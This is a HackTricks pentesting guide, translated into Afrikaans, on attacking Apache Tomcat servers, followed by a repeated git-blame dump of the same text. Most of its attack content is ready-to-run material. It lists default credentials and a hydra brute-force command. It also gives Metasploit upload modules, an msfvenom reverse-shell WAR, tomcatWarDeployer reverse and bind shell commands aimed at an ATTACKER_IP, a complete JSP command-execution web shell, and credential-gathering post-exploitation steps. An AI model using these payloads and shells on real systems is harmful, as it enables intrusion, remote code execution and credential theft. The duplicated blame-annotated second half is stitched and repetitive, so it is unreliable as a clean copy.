hacktricks/network-services-pentesting/pentesting-web/tomcat/README.md

# Tomcat

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Ontdekking

* Dit loop gewoonlik op **poort 8080**
* **Gewone Tomcat fout:**

<figure><img src="../../../.gitbook/assets/image (150).png" alt=""><figcaption></figcaption></figure>

## Opsporing

### **Weergawe Identifikasie**

Om die weergawe van Apache Tomcat te vind, kan 'n eenvoudige opdrag uitgevoer word:
```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
```
Dit sal soek na die term "Tomcat" in die dokumentasie-indeksbladsy, wat die weergawe in die titel-tag van die HTML-antwoord onthul.

### **Bestand Plekke van die Bestuurder**

Om die presiese plekke van **`/manager`** en **`/host-manager`** gidsen te identifiseer, is noodsaaklik aangesien hul name moontlik verander kan word. 'n Brute-force soektog word aanbeveel om hierdie bladsye te vind.

### **Gebruikersnaam Enumerasie**

Vir Tomcat weergawes ouer as 6, is dit moontlik om gebruikersname te enumerate deur:
```bash
msf> use auxiliary/scanner/http/tomcat_enum
```
### **Standaard Kredensiale**

Die **`/manager/html`** gids is veral sensitief aangesien dit die opgradering en implementering van WAR-lêers toelaat, wat kan lei tot kode-uitvoering. Hierdie gids is beskerm deur basiese HTTP-oute, met algemene kredensiale wat is:

* admin:admin
* tomcat:tomcat
* admin:
* admin:s3cr3t
* tomcat:s3cr3t
* admin:tomcat

Hierdie kredensiale kan getoets word met:
```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
Nog 'n noemenswaardige gids is **`/manager/status`**, wat die Tomcat- en OS-weergawe vertoon, wat help met die identifisering van kwesbaarhede.

### **Brute Force Aanval**

Om 'n brute force aanval op die bestuurder-gids te probeer, kan mens gebruik maak van:
```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```
Along with setting various parameters in Metasploit to target a specific host.

## Algemene Kw vulnerabilities

### **Wagwoord Terugsporing Ontsluiting**

Toegang tot `/auth.jsp` mag die wagwoord in 'n terugsporing onthul onder gelukkige omstandighede.

### **Dubbele URL Kodering**

Die CVE-2007-1860 kwesbaarheid in `mod_jk` laat dubbele URL kodering pad traversering toe, wat ongeoorloofde toegang tot die bestuurskoppelvlak via 'n spesiaal saamgestelde URL moontlik maak.

Om toegang te verkry tot die bestuursweb van die Tomcat, gaan na: `pathTomcat/%252E%252E/manager/html`

### /voorbeelde

Apache Tomcat weergawes 4.x tot 7.x sluit voorbeeldskripte in wat vatbaar is vir inligtingsontsluiting en kruis-webskripting (XSS) aanvalle. Hierdie skripte, wat omvattend gelys is, moet nagegaan word vir ongeoorloofde toegang en potensiële uitbuiting. Vind [meer inligting hier](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)

* /voorbeelde/jsp/num/numguess.jsp
* /voorbeelde/jsp/dates/date.jsp
* /voorbeelde/jsp/snp/snoop.jsp
* /voorbeelde/jsp/error/error.html
* /voorbeelde/jsp/sessions/carts.html
* /voorbeelde/jsp/checkbox/check.html
* /voorbeelde/jsp/colors/colors.html
* /voorbeelde/jsp/cal/login.html
* /voorbeelde/jsp/include/include.jsp
* /voorbeelde/jsp/forward/forward.jsp
* /voorbeelde/jsp/plugin/plugin.jsp
* /voorbeelde/jsp/jsptoserv/jsptoservlet.jsp
* /voorbeelde/jsp/simpletag/foo.jsp
* /voorbeelde/jsp/mail/sendmail.jsp
* /voorbeelde/servlet/HelloWorldExample
* /voorbeelde/servlet/RequestInfoExample
* /voorbeelde/servlet/RequestHeaderExample
* /voorbeelde/servlet/RequestParamExample
* /voorbeelde/servlet/CookieExample
* /voorbeelde/servlet/JndiServlet
* /voorbeelde/servlet/SessionExample
* /tomcat-docs/appdev/sample/web/hello.jsp

### **Pad Traversering Uitbuiting**

In sommige [**kwesbare konfigurasies van Tomcat**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) kan jy toegang verkry tot beskermde gidse in Tomcat met die pad: `/..;/`

So, byvoorbeeld, mag jy in staat wees om die **Tomcat bestuurder** bladsy te bekom deur toegang te verkry tot: `www.vulnerable.com/lalala/..;/manager/html`

**Nog 'n manier** om beskermde pades te omseil met hierdie truuk is om toegang te verkry tot `http://www.vulnerable.com/;param=value/manager/html`

## RCE

Laastens, as jy toegang het tot die Tomcat Web Toepassing Bestuurder, kan jy **'n .war-lêer oplaai en ontplooi (kode uitvoer)**.

### Beperkings

Jy sal slegs in staat wees om 'n WAR te ontplooi as jy **genoeg bevoegdhede** het (rolle: **admin**, **manager** en **manager-script**). Daardie besonderhede kan gevind word onder _tomcat-users.xml_ wat gewoonlik gedefinieer is in `/usr/share/tomcat9/etc/tomcat-users.xml` (dit verskil tussen weergawes) (sien [POST ](./#post)section).
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed

# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"

# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```
### Metasploit
```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```
### MSFVenom Reverse Shell

1. Skep die war om te ontplooi:
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
```
2. Laai die `revshell.war` lêer op en toegang tot dit (`/revshell/`):

### Bind en omgekeerde shell met [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)

In sommige scenario's werk dit nie (byvoorbeeld ou weergawes van sun)

#### Laai af
```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```
#### Terugskakel
```bash
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```
#### Bind shell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
```
### Gebruik [Culsterd](https://github.com/hatRiot/clusterd)
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
### Handmatige metode - Web shell

Skep **index.jsp** met hierdie [inhoud](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):
```java
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
}  catch(IOException e) {   e.printStackTrace();   }
}
%>
<pre><%=output %></pre>
```

```bash
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it
```
U kan ook dit installeer (maak opgelaai, aflaai en opdraguitvoering moontlik): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)

### Handmatige Metode 2

Kry 'n JSP web shell soos [hierdie](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) en skep 'n WAR-lêer:
```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```
## POST

Die naam van die Tomcat geloofsbriewe lêer is _tomcat-users.xml_
```bash
find / -name tomcat-users.xml 2>/dev/null
```
Ander maniere om Tomcat-akkrediteerings te versamel:
```bash
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
```
## Ander tomcat skandeergereedskap

* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)

## Verwysings

* [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)


{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
GitBook: No commit message 2024-04-06 18:08:38 +00:00			`# Tomcat`

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`{% hint style="success" %}`
			`Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

GitBook: No commit message 2024-04-06 18:08:38 +00:00			`<details>`

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`<summary>Ondersteun HackTricks</summary>`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`* Kyk na die [subskripsie planne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord groep](https://discord.gg/hRep4RUj7f) of die [telegram groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Deel hacking truuks deur PRs in te dien na die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`</details>`
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`{% endhint %}`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`## Ontdekking`

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`* Dit loop gewoonlik op poort 8080`
			`* Gewone Tomcat fout:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`<figure><img src="../../../.gitbook/assets/image (150).png" alt=""><figcaption></figcaption></figure>`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`## Opsporing`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### Weergawe Identifikasie`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`Om die weergawe van Apache Tomcat te vind, kan 'n eenvoudige opdrag uitgevoer word:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`curl -s http://tomcat-site.local:8080/docs/ \| grep Tomcat`
			```
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`Dit sal soek na die term "Tomcat" in die dokumentasie-indeksbladsy, wat die weergawe in die titel-tag van die HTML-antwoord onthul.`
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00
			`### Bestand Plekke van die Bestuurder`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			Om die presiese plekke van `/manager` en `/host-manager` gidsen te identifiseer, is noodsaaklik aangesien hul name moontlik verander kan word. 'n Brute-force soektog word aanbeveel om hierdie bladsye te vind.
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### Gebruikersnaam Enumerasie`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`Vir Tomcat weergawes ouer as 6, is dit moontlik om gebruikersname te enumerate deur:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`msf> use auxiliary/scanner/http/tomcat_enum`
			```
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### Standaard Kredensiale`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			Die `/manager/html` gids is veral sensitief aangesien dit die opgradering en implementering van WAR-lêers toelaat, wat kan lei tot kode-uitvoering. Hierdie gids is beskerm deur basiese HTTP-oute, met algemene kredensiale wat is:
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`* admin:admin`
			`* tomcat:tomcat`
			`* admin:`
			`* admin:s3cr3t`
			`* tomcat:s3cr3t`
			`* admin:tomcat`

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`Hierdie kredensiale kan getoets word met:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`msf> use auxiliary/scanner/http/tomcat_mgr_login`
			```
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			Nog 'n noemenswaardige gids is `/manager/status`, wat die Tomcat- en OS-weergawe vertoon, wat help met die identifisering van kwesbaarhede.
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### Brute Force Aanval`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`Om 'n brute force aanval op die bestuurder-gids te probeer, kan mens gebruik maak van:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html`
			```
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`Along with setting various parameters in Metasploit to target a specific host.`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`## Algemene Kw vulnerabilities`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### Wagwoord Terugsporing Ontsluiting`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			Toegang tot `/auth.jsp` mag die wagwoord in 'n terugsporing onthul onder gelukkige omstandighede.
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### Dubbele URL Kodering`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			Die CVE-2007-1860 kwesbaarheid in `mod_jk` laat dubbele URL kodering pad traversering toe, wat ongeoorloofde toegang tot die bestuurskoppelvlak via 'n spesiaal saamgestelde URL moontlik maak.
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			Om toegang te verkry tot die bestuursweb van die Tomcat, gaan na: `pathTomcat/%252E%252E/manager/html`

			`### /voorbeelde`

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`Apache Tomcat weergawes 4.x tot 7.x sluit voorbeeldskripte in wat vatbaar is vir inligtingsontsluiting en kruis-webskripting (XSS) aanvalle. Hierdie skripte, wat omvattend gelys is, moet nagegaan word vir ongeoorloofde toegang en potensiële uitbuiting. Vind [meer inligting hier](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`* /voorbeelde/jsp/num/numguess.jsp`
			`* /voorbeelde/jsp/dates/date.jsp`
			`* /voorbeelde/jsp/snp/snoop.jsp`
			`* /voorbeelde/jsp/error/error.html`
			`* /voorbeelde/jsp/sessions/carts.html`
			`* /voorbeelde/jsp/checkbox/check.html`
			`* /voorbeelde/jsp/colors/colors.html`
			`* /voorbeelde/jsp/cal/login.html`
			`* /voorbeelde/jsp/include/include.jsp`
			`* /voorbeelde/jsp/forward/forward.jsp`
			`* /voorbeelde/jsp/plugin/plugin.jsp`
			`* /voorbeelde/jsp/jsptoserv/jsptoservlet.jsp`
			`* /voorbeelde/jsp/simpletag/foo.jsp`
			`* /voorbeelde/jsp/mail/sendmail.jsp`
			`* /voorbeelde/servlet/HelloWorldExample`
			`* /voorbeelde/servlet/RequestInfoExample`
			`* /voorbeelde/servlet/RequestHeaderExample`
			`* /voorbeelde/servlet/RequestParamExample`
			`* /voorbeelde/servlet/CookieExample`
			`* /voorbeelde/servlet/JndiServlet`
			`* /voorbeelde/servlet/SessionExample`
			`* /tomcat-docs/appdev/sample/web/hello.jsp`

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### Pad Traversering Uitbuiting`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			In sommige [kwesbare konfigurasies van Tomcat](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) kan jy toegang verkry tot beskermde gidse in Tomcat met die pad: `/..;/`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			So, byvoorbeeld, mag jy in staat wees om die Tomcat bestuurder bladsy te bekom deur toegang te verkry tot: `www.vulnerable.com/lalala/..;/manager/html`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			Nog 'n manier om beskermde pades te omseil met hierdie truuk is om toegang te verkry tot `http://www.vulnerable.com/;param=value/manager/html`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`## RCE`

Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`Laastens, as jy toegang het tot die Tomcat Web Toepassing Bestuurder, kan jy 'n .war-lêer oplaai en ontplooi (kode uitvoer).`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`### Beperkings`

Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			Jy sal slegs in staat wees om 'n WAR te ontplooi as jy genoeg bevoegdhede het (rolle: admin, manager en manager-script). Daardie besonderhede kan gevind word onder _tomcat-users.xml_ wat gewoonlik gedefinieer is in `/usr/share/tomcat9/etc/tomcat-users.xml` (dit verskil tussen weergawes) (sien [POST ](./#post)section).
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed`

			`# deploy under "path" context path`
			`curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"`

			`# undeploy`
			`curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"`
			```
			`### Metasploit`
			```bash
			`use exploit/multi/http/tomcat_mgr_upload`
			`msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>`
			`msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>`
			`msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>`
			`msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>`
			`msf exploit(multi/http/tomcat_mgr_upload) > exploit`
			```
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### MSFVenom Reverse Shell`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`1. Skep die war om te ontplooi:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
Translated ['network-services-pentesting/pentesting-web/tomcat/README.md 2024-04-11 00:57:33 +00:00			`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			2. Laai die `revshell.war` lêer op en toegang tot dit (`/revshell/`):
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### Bind en omgekeerde shell met [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`In sommige scenario's werk dit nie (byvoorbeeld ou weergawes van sun)`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`#### Laai af`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`git clone https://github.com/mgeeky/tomcatWarDeployer.git`
			```
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`#### Terugskakel`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/`
			```
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`#### Bind shell`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/`
			```
			`### Gebruik [Culsterd](https://github.com/hatRiot/clusterd)`
			```bash
			`clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows`
			```
			`### Handmatige metode - Web shell`

			`Skep index.jsp met hierdie [inhoud](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):`
			```java
			`<FORM METHOD=GET ACTION='index.jsp'>`
			`<INPUT name='cmd' type=text>`
			`<INPUT type=submit value='Run'>`
			`</FORM>`
			`<%@ page import="java.io.*" %>`
			`<%`
			`String cmd = request.getParameter("cmd");`
			`String output = "";`
			`if(cmd != null) {`
			`String s = null;`
			`try {`
			`Process p = Runtime.getRuntime().exec(cmd,null,null);`
			`BufferedReader sI = new BufferedReader(new`
			`InputStreamReader(p.getInputStream()));`
			`while((s = sI.readLine()) != null) { output += s+"</br>"; }`
			`} catch(IOException e) { e.printStackTrace(); }`
			`}`
			`%>`
			`<pre><%=output %></pre>`
			```

			```bash
			`mkdir webshell`
			`cp index.jsp webshell`
			`cd webshell`
			`jar -cvf ../webshell.war *`
			`webshell.war is created`
			`# Upload it`
			```
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`U kan ook dit installeer (maak opgelaai, aflaai en opdraguitvoering moontlik): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`### Handmatige Metode 2`

			`Kry 'n JSP web shell soos [hierdie](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) en skep 'n WAR-lêer:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp`
			`zip -r backup.war cmd.jsp`
			`# When this file is uploaded to the manager GUI, the /backup application will be added to the table.`
			`# Go to: http://tomcat-site.local:8180/backup/cmd.jsp`
			```
			`## POST`

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`Die naam van die Tomcat geloofsbriewe lêer is _tomcat-users.xml_`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`find / -name tomcat-users.xml 2>/dev/null`
			```
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`Ander maniere om Tomcat-akkrediteerings te versamel:`
GitBook: No commit message 2024-04-06 18:08:38 +00:00			```bash
			`msf> use post/multi/gather/tomcat_gather`
			`msf> use post/windows/gather/enum_tomcat`
			```
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-09-04 13:35:49 +00:00			`## Ander tomcat skandeergereedskap`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)`

			`## Verwysings`

			`* [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)`
			`* [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)`


Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`{% hint style="success" %}`
			`Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Opleiding AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Opleiding GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

GitBook: No commit message 2024-04-06 18:08:38 +00:00			`<details>`

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`<summary>Ondersteun HackTricks</summary>`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`* Kyk na die [subskripsieplanne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Deel hacking truuks deur PRs in te dien na die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GitBook: No commit message 2024-04-06 18:08:38 +00:00
			`</details>`
Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo 2024-07-18 22:16:31 +00:00			`{% endhint %}`